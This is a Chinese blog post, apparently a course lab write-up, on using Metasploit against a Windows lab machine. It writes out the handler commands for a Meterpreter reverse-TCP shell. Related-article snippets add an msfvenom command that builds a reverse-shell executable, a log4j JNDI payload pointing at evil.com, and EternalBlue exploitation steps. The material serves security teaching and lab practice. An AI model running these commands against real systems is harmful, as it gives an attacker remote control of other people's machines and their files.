【漏洞复现】Metasploit应用漏洞复现

最新推荐文章于 2024-06-25 08:54:03 发布
最新推荐文章于 2024-06-25 08:54:03 发布
阅读量384 收藏 10
点赞数 7
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ljn176118045/article/details/135289337
版权
二、Metasploit应用
1、生成主控端、被控端。
2、获得靶机(Windows)控制权。
3、下载靶机上任意一个文件。

首先,输入代码,生成被控端可运行程序

复制到电脑中

然后利用kali查看payload的各种漏洞,但似乎都看不懂

接下来我们生成主控端

依次输入以下代码,注意此处的ip为kali的ip

 use exploit/multi/handler
 set payload windows/meterpreter/reverse_tcp
 set lhost 192.168.47.128
 set lport 5000
 exploit

可以看到有一个图片,我是放到桌面的

下载

最后在路径查看即可

成功

ljn176118045
关注
  • 7
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
迈普 多业务融合网关 send_order.cgi 前台RCE漏洞复现
0xSec
06-03 610
迈普 多业务融合网关 send_order.cgi 接口处存在命令执行漏洞,未经身份验证的远程攻击者可利用此漏洞执行任意系统指令,从而获取服务器shell权限。
metasploit3靶场验证】GlassFish相关漏洞利用复现
Slience_Jhon的博客
11-21 221
Exploit failed: linux/x86/meterpreter/reverse_top is not a compatible payload. 错误解决
复现实验 Metasploit应用 漏洞渗透测试
m0_74634242的博客
12-28 844
msfvenom -p windows/meterpreter/reverse_tcp lhost=kali的IP lport=kali的端口号 -f exe -o /var/payload.exe (生成文件的地址)-p, --payload 指定要生成的payload( 攻击荷载)。-f, --format 指定输出格式(可以使用 --help-formats 来获取msf支持的输出格式列表)–help-formats 查看msf支持的输出格式列表。-o, --out 指定存储payload的位置。
【面试题】漏洞复现的步骤
Nove1205的博客
06-25 467
漏洞复现的步骤
复现任务——漏洞渗透测试及Metasploit应用
m0_74087834的博客
12-29 1055
一、漏洞渗透测试 1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。 2、利用Nmap扫描发现靶机(Windows)运行了该服务。 3、利用该漏洞,使得靶机运行计算器。 见第六章PPT或PDF文档 二、Metasploit应用 1、生成主控端、被控端。 2、获得靶机(Windows)控制权。 3、下载靶机上任意一个文件。 见课本P127-133
简单漏洞复现_网络渗透测试
Radiency的博客
11-23 1578
利用easy file sharing server服务漏洞;远程控制目标,生成主控端、被控端,获得靶机控制权。
CVE-2021-44228漏洞复现
m0_65764670的博客
05-29 1312
漏洞为log4j2漏洞,log4j2是java语言的日志处理套件,使用很广泛。在2.0到2.14.1版本中存在JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似'${jndi:ldap://evil.com/example}'​的参数进行JNDI注入,执行任意代码(注:Java环境1.8也可能会存在)什么是JNDI?
elfinder 命令注入 (CVE-2021-32682) 漏洞复现分析 | snort规则
weixin_68999845的博客
08-23 881
这个标志组合的意思是,在创建或更新 ZIP 归档时,会先添加文件到归档中,然后立即运行测试来验证归档的完整性,并且在执行过程中显示详细信息,\1. 复现过程:https://www.cnblogs.com/NoCirc1e/p/16275613.html。下载地址:https://github.com/Studio-42/elFinder,下载完成后,重命名。\2. 源码下载url:https://github.com/Studio-42/elFinder。
3389(RDP)CVE-2019-0708 漏洞复现
三天不打上房揭瓦的博客
12-22 7214
前言:小编也是现学现卖,方便自己记忆,写的不好的地方多多包涵,希望各位大佬多多批评指正。 目录漏洞概述影响版本环境搭建和漏洞复现检测方法1:检测方法2:漏洞利用方法1:可导致目标系统蓝屏漏洞利用方法2: 可导致目标系统蓝屏漏洞修复 漏洞概述 CVE-2019-0708是微软于2019年05月14日发布的一个严重的RDP远程代码执行漏洞。该漏洞无需身份认证和用户交互,可能形成蠕虫爆发,影响堪比wannycry。 2019年09月07日,@rapid7 在其metasploit-framework仓库公开发布
永恒之蓝复现kaliwin7
07-19
### 恒之蓝漏洞复现:Kali Linux 攻击 Windows 7 #### 实验背景及目的 “永恒之蓝”(EternalBlue)是一种针对 Windows 操作系统的严重漏洞,该漏洞允许攻击者在无需用户交互的情况下实现远程代码执行。本次实验...
Metasploit 实现木马生成、捆绑及免杀-内含源码以及设计说明书(可以自己运行复现).zip
05-08
Metasploit 框架包含了大量的预构建的攻击模块,这些模块覆盖了各种操作系统和应用软件的漏洞。其核心功能包括漏洞扫描、漏洞验证、payload 生成、shellcode 编码以及后渗透阶段的控制台交互等。 ### 二、木马生成 ...
毒蛇:metasploit-framework图形界面图形化内网渗透工具
02-01
Metasploit-Framework是一个开源项目,由 Rapid7 维护,它包含了大量的漏洞利用模块、payloads(有效载荷)以及后渗透工具。这个框架允许安全专家和道德黑客模拟攻击,测试网络防御,评估安全风险。通过Metasploit,...
Metasploit.Toolkit.for.Penetration.Testing.Exploit
12-27
2. **漏洞复现**:利用Metasploit提供的框架,安全专家可以轻松地重现特定的漏洞,这对于验证漏洞的存在性非常有用。 3. **自定义模块开发**:Metasploit允许用户编写自己的漏洞利用模块或攻击载荷,这为研究人员...
第42天:漏洞发现-操作系统之漏洞探针类型利用修复1
08-03
例如,针对CVE-2019-0708和MS12-020等知名漏洞,可以使用Metasploit进行复现和分析。Searchsploit是另一个实用工具,用于查找和利用公开的exploit数据库,通过命令行参数如`-c`, `-e`, `-p`, `-t`等,可以进行精确的...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8349
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
聊天室、websocket、socket.io、毕业设计.zip
07-27
聊天室、websocket、socket.io、毕业设计.zip
微麦电影购票小程序,分为三部分-小程序端-商家(影院)后台与官方后台.zip
最新发布
07-27
微麦电影购票小程序,分为三部分-小程序端-商家(影院)后台与官方后台.zip
windows10永恒之蓝漏洞复现
05-24
Windows10永恒之蓝漏洞是指微软Windows操作系统的SMBv1协议中的一个安全漏洞,该漏洞最初被美国国家安全局(NSA)利用,后来泄露出来被黑客组织WannaCry等利用。该漏洞可以允许攻击者远程执行代码,获取敏感信息或者感染计算机病毒。复现漏洞需要使用Metasploit等工具进行攻击。 以下是简单的复现步骤: 1. 安装Kali Linux和Metasploit工具。 2. 执行Metasploit并搜索eternalblue模块。 3. 选择并运行该模块,设置目标IP地址和payload。 4. 执行攻击,如果成功则可以获取目标系统的权限。 但请注意,复现漏洞可能会对网络造成不良影响,而且仅限于研究目的。在实际应用中,请不要使用这些技术攻击他人的网络和系统。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值